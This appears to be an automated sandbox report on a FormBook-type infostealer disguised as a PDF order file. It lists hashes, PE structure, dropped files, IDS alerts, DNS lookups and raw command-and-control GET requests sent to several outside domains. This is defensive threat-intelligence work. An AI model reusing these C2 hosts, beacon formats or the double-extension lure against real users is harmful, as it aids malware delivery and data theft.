                              Order_Specifications.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 188.114.97.3
                              Ref_5010_103.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              Ship_Doc_18505.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              https://autoblazquez.comGet hashmaliciousUnknownBrowse
                              • 104.22.71.197
                              https://tinyurl.com/5xa2ubd7Get hashmaliciousUnknownBrowse
                              • 104.17.112.233
                              https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/human-verify-system.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 104.16.124.96
                              Review-Complete agreement for Cardfactory IDDisburement_2a75f1f31445805212fc773a74f9027b51a85ebe.emlGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              No context
                              No context
                              Process:C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.379677338874509
                              Encrypted:false
                              SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:tLHxvIIwLgZ2KRHWLOugQs
                              MD5:6FFAE47E170B8C4BF11123D7E6AF2565
                              SHA1:CCA653FCEF2BE1689FB17674EBD76D1C945044EF
                              SHA-256:55F237E5A06113F744AA80B6C1321E8AFF20C3389C533F0ADF34593934CEAF9F
                              SHA-512:C1B37A35B61634C2FDCAB66F93C6326630E55337EB709E0AF31EE5557BF17B0F03EE00BD96B2D3018A9D1E16FADCF567A9F2C88951D385EBA7BB1E9D6497B4AE
                              Malicious:false
                              Reputation:low
                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.754029502719996
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:ORDER_1105-19-24-3537.pdf.exe
                              File size:611'840 bytes
                              MD5:a2082543a1c1028dd0a613a6a2af4d21
                              SHA1:b6fff58598fad2366a05c18d2d3ccf00f7403391
                              SHA256:ee118f8e57acfa0e476638a011ed8d6664d1499e1b326180e21e6f9834ea93e0
                              SHA512:0dad8d8910dfe0d567477c00a1ded696f5ad582fa671731480ae0d8662994a44f61af23373d3c90b44979fb4a6c3fc47ac5f0123442b9af48283ba4fe7a03370
                              SSDEEP:12288:u8EaxDW9G3pwB8uVR8WMQSiWLog+ggWgadajFCMQYcnNdhyq71724Lt:FEaxD31YOW5CzWUTN6E1R
                              TLSH:BED4E1B75363BDE3D3370EF58D40B5815E20083F9E3C95A8ACDB52C811E35A46AB8D66
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#................0..L.........."j... ........@.. ....................................@................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x496a22
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x8C1323AF [Mon Jun 20 19:42:39 2044 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x969cf0x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x5cc.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x952500x70.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x94a280x94c00217ac6c4035bfeeb8529eaec342ec680False0.8755563944327731data7.758118048517549IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x980000x5cc0x60043754a88e7d6074ac22519027cadfa7dFalse0.4283854166666667data4.1394579308464685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x9a0000xc0x20050cb78b21433e2af5bfc8859aa535b83False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x980900x33cdata0.42995169082125606
                              RT_MANIFEST0x983dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                              DLLImport
                              mscoree.dll_CorExeMain
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-23T14:38:29.395285+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.5497213.33.130.19080TCP
                              2024-09-23T14:38:29.395285+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.5497213.33.130.19080TCP
                              2024-09-23T14:38:29.395285+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.5497213.33.130.19080TCP
                              2024-09-23T14:39:16.104025+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549716185.53.179.9080TCP
                              2024-09-23T14:39:16.104025+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549716185.53.179.9080TCP
                              2024-09-23T14:39:16.104025+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549716185.53.179.9080TCP
                              2024-09-23T14:39:56.698099+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549718162.0.209.780TCP
                              2024-09-23T14:39:56.698099+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549718162.0.209.780TCP
                              2024-09-23T14:39:56.698099+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549718162.0.209.780TCP
                              2024-09-23T14:40:17.342637+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54971923.227.38.7480TCP
                              2024-09-23T14:40:17.342637+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54971923.227.38.7480TCP
                              2024-09-23T14:40:17.342637+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54971923.227.38.7480TCP
                              2024-09-23T14:40:58.694135+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549720154.21.81.14280TCP
                              2024-09-23T14:40:58.694135+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549720154.21.81.14280TCP
                              2024-09-23T14:40:58.694135+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.549720154.21.81.14280TCP
                              2024-09-23T14:42:20.275189+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972213.248.252.11480TCP
                              2024-09-23T14:42:20.275189+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972213.248.252.11480TCP
                              2024-09-23T14:42:20.275189+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972213.248.252.11480TCP
                              2024-09-23T14:42:40.656006+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972335.214.167.2480TCP
                              2024-09-23T14:42:40.656006+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972335.214.167.2480TCP
                              2024-09-23T14:42:40.656006+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972335.214.167.2480TCP
                              2024-09-23T14:43:02.401051+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972450.87.178.23880TCP
                              2024-09-23T14:43:02.401051+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972450.87.178.23880TCP
                              2024-09-23T14:43:02.401051+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.54972450.87.178.23880TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Sep 23, 2024 14:39:15.604041100 CEST4971680192.168.2.5185.53.179.90
                              Sep 23, 2024 14:39:15.608846903 CEST8049716185.53.179.90192.168.2.5
                              Sep 23, 2024 14:39:15.608957052 CEST4971680192.168.2.5185.53.179.90
                              Sep 23, 2024 14:39:15.609019041 CEST4971680192.168.2.5185.53.179.90
                              Sep 23, 2024 14:39:15.613787889 CEST8049716185.53.179.90192.168.2.5
                              Sep 23, 2024 14:39:16.098500013 CEST4971680192.168.2.5185.53.179.90
                              Sep 23, 2024 14:39:16.103934050 CEST8049716185.53.179.90192.168.2.5
                              Sep 23, 2024 14:39:16.104024887 CEST4971680192.168.2.5185.53.179.90
                              Sep 23, 2024 14:39:56.195775032 CEST4971880192.168.2.5162.0.209.7
                              Sep 23, 2024 14:39:56.200638056 CEST8049718162.0.209.7192.168.2.5
                              Sep 23, 2024 14:39:56.200747967 CEST4971880192.168.2.5162.0.209.7
                              Sep 23, 2024 14:39:56.200846910 CEST4971880192.168.2.5162.0.209.7
                              Sep 23, 2024 14:39:56.206127882 CEST8049718162.0.209.7192.168.2.5
                              Sep 23, 2024 14:39:56.692693949 CEST4971880192.168.2.5162.0.209.7
                              Sep 23, 2024 14:39:56.697875023 CEST8049718162.0.209.7192.168.2.5
                              Sep 23, 2024 14:39:56.698098898 CEST4971880192.168.2.5162.0.209.7
                              Sep 23, 2024 14:40:16.858856916 CEST4971980192.168.2.523.227.38.74
                              Sep 23, 2024 14:40:16.863709927 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:16.863878012 CEST4971980192.168.2.523.227.38.74
                              Sep 23, 2024 14:40:16.863974094 CEST4971980192.168.2.523.227.38.74
                              Sep 23, 2024 14:40:16.869157076 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:17.324412107 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:17.324449062 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:17.324457884 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:17.324471951 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:17.324484110 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:17.324557066 CEST4971980192.168.2.523.227.38.74
                              Sep 23, 2024 14:40:17.324776888 CEST804971923.227.38.74192.168.2.5
                              Sep 23, 2024 14:40:17.324840069 CEST4971980192.168.2.523.227.38.74
                              Sep 23, 2024 14:40:17.342637062 CEST4971980192.168.2.523.227.38.74
                              Sep 23, 2024 14:40:58.174417973 CEST4972080192.168.2.5154.21.81.142
                              Sep 23, 2024 14:40:58.179352045 CEST8049720154.21.81.142192.168.2.5
                              Sep 23, 2024 14:40:58.179536104 CEST4972080192.168.2.5154.21.81.142
                              Sep 23, 2024 14:40:58.179536104 CEST4972080192.168.2.5154.21.81.142
                              Sep 23, 2024 14:40:58.184355021 CEST8049720154.21.81.142192.168.2.5
                              Sep 23, 2024 14:40:58.676424980 CEST4972080192.168.2.5154.21.81.142
                              Sep 23, 2024 14:40:58.694067955 CEST8049720154.21.81.142192.168.2.5
                              Sep 23, 2024 14:40:58.694134951 CEST4972080192.168.2.5154.21.81.142
                              TimestampSource PortDest PortSource IPDest IP
                              Sep 23, 2024 14:39:15.557739973 CEST5522053192.168.2.51.1.1.1
                              Sep 23, 2024 14:39:15.603338957 CEST53552201.1.1.1192.168.2.5
                              Sep 23, 2024 14:39:35.896287918 CEST5050253192.168.2.51.1.1.1
                              Sep 23, 2024 14:39:35.923330069 CEST53505021.1.1.1192.168.2.5
                              Sep 23, 2024 14:39:56.177295923 CEST6264753192.168.2.51.1.1.1
                              Sep 23, 2024 14:39:56.194933891 CEST53626471.1.1.1192.168.2.5
                              Sep 23, 2024 14:40:16.606930971 CEST6415753192.168.2.51.1.1.1
                              Sep 23, 2024 14:40:16.857897043 CEST53641571.1.1.1192.168.2.5
                              Sep 23, 2024 14:40:57.741286993 CEST5728553192.168.2.51.1.1.1
                              Sep 23, 2024 14:40:58.170066118 CEST53572851.1.1.1192.168.2.5
                              Sep 23, 2024 14:41:18.193027973 CEST6169053192.168.2.51.1.1.1
                              Sep 23, 2024 14:41:18.204566956 CEST53616901.1.1.1192.168.2.5
                              Sep 23, 2024 14:41:38.673626900 CEST6117653192.168.2.51.1.1.1
                              Sep 23, 2024 14:41:38.685558081 CEST53611761.1.1.1192.168.2.5
                              Sep 23, 2024 14:41:59.114470959 CEST5778353192.168.2.51.1.1.1
                              Sep 23, 2024 14:41:59.139307022 CEST53577831.1.1.1192.168.2.5
                              Sep 23, 2024 14:42:19.576968908 CEST5086053192.168.2.51.1.1.1
                              Sep 23, 2024 14:42:19.759835958 CEST53508601.1.1.1192.168.2.5
                              Sep 23, 2024 14:42:40.008305073 CEST5467753192.168.2.51.1.1.1
                              Sep 23, 2024 14:42:40.125201941 CEST53546771.1.1.1192.168.2.5
                              Sep 23, 2024 14:43:01.864563942 CEST5933953192.168.2.51.1.1.1
                              Sep 23, 2024 14:43:01.902484894 CEST53593391.1.1.1192.168.2.5
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 23, 2024 14:39:15.557739973 CEST192.168.2.51.1.1.10xaa30Standard query (0)www.abandoned-houses-39863.bondA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:39:35.896287918 CEST192.168.2.51.1.1.10xc46aStandard query (0)www.bigbrown999.siteA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:39:56.177295923 CEST192.168.2.51.1.1.10x199aStandard query (0)www.bdkasinoxox.xyzA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:40:16.606930971 CEST192.168.2.51.1.1.10x5f55Standard query (0)www.day2go.netA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:40:57.741286993 CEST192.168.2.51.1.1.10xca3dStandard query (0)www.qwechaotk.topA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:41:18.193027973 CEST192.168.2.51.1.1.10x698eStandard query (0)www.ln2m1.shopA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:41:38.673626900 CEST192.168.2.51.1.1.10x5c24Standard query (0)www.practicalfranchises.infoA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:41:59.114470959 CEST192.168.2.51.1.1.10x93deStandard query (0)www.yzh478c.xyzA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:42:19.576968908 CEST192.168.2.51.1.1.10x5c5cStandard query (0)www.hinet.techA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:42:40.008305073 CEST192.168.2.51.1.1.10x1a76Standard query (0)www.beauty.universityA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:43:01.864563942 CEST192.168.2.51.1.1.10x79c1Standard query (0)www.nicoleb.techA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 23, 2024 14:39:15.603338957 CEST1.1.1.1192.168.2.50xaa30No error (0)www.abandoned-houses-39863.bond185.53.179.90A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:39:35.923330069 CEST1.1.1.1192.168.2.50xc46aServer failure (2)www.bigbrown999.sitenonenoneA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:39:56.194933891 CEST1.1.1.1192.168.2.50x199aNo error (0)www.bdkasinoxox.xyzbdkasinoxox.xyzCNAME (Canonical name)IN (0x0001)false
                              Sep 23, 2024 14:39:56.194933891 CEST1.1.1.1192.168.2.50x199aNo error (0)bdkasinoxox.xyz162.0.209.7A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:40:16.857897043 CEST1.1.1.1192.168.2.50x5f55No error (0)www.day2go.netf8f982-7.myshopify.comCNAME (Canonical name)IN (0x0001)false
                              Sep 23, 2024 14:40:16.857897043 CEST1.1.1.1192.168.2.50x5f55No error (0)f8f982-7.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                              Sep 23, 2024 14:40:16.857897043 CEST1.1.1.1192.168.2.50x5f55No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:40:58.170066118 CEST1.1.1.1192.168.2.50xca3dNo error (0)www.qwechaotk.top154.21.81.142A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:41:18.204566956 CEST1.1.1.1192.168.2.50x698eName error (3)www.ln2m1.shopnonenoneA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:41:38.685558081 CEST1.1.1.1192.168.2.50x5c24No error (0)www.practicalfranchises.infopracticalfranchises.infoCNAME (Canonical name)IN (0x0001)false
                              Sep 23, 2024 14:41:38.685558081 CEST1.1.1.1192.168.2.50x5c24No error (0)practicalfranchises.info3.33.130.190A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:41:38.685558081 CEST1.1.1.1192.168.2.50x5c24No error (0)practicalfranchises.info15.197.148.33A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:41:59.139307022 CEST1.1.1.1192.168.2.50x93deName error (3)www.yzh478c.xyznonenoneA (IP address)IN (0x0001)false
                              Sep 23, 2024 14:42:19.759835958 CEST1.1.1.1192.168.2.50x5c5cNo error (0)www.hinet.tech13.248.252.114A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:42:19.759835958 CEST1.1.1.1192.168.2.50x5c5cNo error (0)www.hinet.tech99.83.138.213A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:42:40.125201941 CEST1.1.1.1192.168.2.50x1a76No error (0)www.beauty.university35.214.167.24A (IP address)IN (0x0001)false
                              Sep 23, 2024 14:43:01.902484894 CEST1.1.1.1192.168.2.50x79c1No error (0)www.nicoleb.technicoleb.techCNAME (Canonical name)IN (0x0001)false
                              Sep 23, 2024 14:43:01.902484894 CEST1.1.1.1192.168.2.50x79c1No error (0)nicoleb.tech50.87.178.238A (IP address)IN (0x0001)false
                              • www.abandoned-houses-39863.bond
                              • www.bdkasinoxox.xyz
                              • www.day2go.net
                              • www.qwechaotk.top
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.549716185.53.179.90801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Sep 23, 2024 14:39:15.609019041 CEST180OUTGET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=+TOTySD/xKzI1m9iyt2YV9oe7irabqlb0FG3M+MtGGXp3TOb0Tp0F4yVfcOIeMFlF/xp HTTP/1.1
                              Host: www.abandoned-houses-39863.bond
                              Connection: close
                              Data Raw: 00 00 00 00 00 00 00
                              Data Ascii:


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.549718162.0.209.7801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Sep 23, 2024 14:39:56.200846910 CEST168OUTGET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp HTTP/1.1
                              Host: www.bdkasinoxox.xyz
                              Connection: close
                              Data Raw: 00 00 00 00 00 00 00
                              Data Ascii:


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.54971923.227.38.74801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Sep 23, 2024 14:40:16.863974094 CEST163OUTGET /rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA HTTP/1.1
                              Host: www.day2go.net
                              Connection: close
                              Data Raw: 00 00 00 00 00 00 00
                              Data Ascii:
                              Sep 23, 2024 14:40:17.324412107 CEST1236INHTTP/1.1 403 Forbidden
                              Date: Mon, 23 Sep 2024 12:40:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4514
                              Connection: close
